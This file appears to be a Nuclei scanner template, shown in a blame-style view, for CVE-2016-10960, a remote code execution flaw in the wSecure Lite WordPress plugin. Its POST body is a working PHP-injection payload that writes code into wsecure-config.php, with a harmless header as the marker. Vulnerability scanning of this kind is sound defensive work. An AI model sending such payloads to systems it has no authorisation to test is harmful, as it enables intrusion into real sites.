nuclei-templates/cves/2016/CVE-2016-10960.yaml

35 lines
1.2 KiB
YAML
Raw Normal View History

2021-07-15 02:41:14 +00:00
id: CVE-2016-10960
info:
name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
author: daffainfo
severity: high
2021-07-15 02:41:14 +00:00
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
reference:
2021-07-16 05:43:17 +00:00
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
2021-07-15 02:41:14 +00:00
tags: cve,cve2016,wordpress,wp-plugin,rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2016-10960
cwe-id: CWE-20
2021-07-15 02:41:14 +00:00
requests:
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
2021-07-16 12:24:37 +00:00
body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
2021-07-15 02:41:14 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-16 12:24:37 +00:00
- "Nuclei: CVE-2016-10960"
2021-07-15 02:41:14 +00:00
condition: and
2021-07-16 12:24:37 +00:00
part: header
2021-07-15 02:41:14 +00:00
- type: status
status:
- 200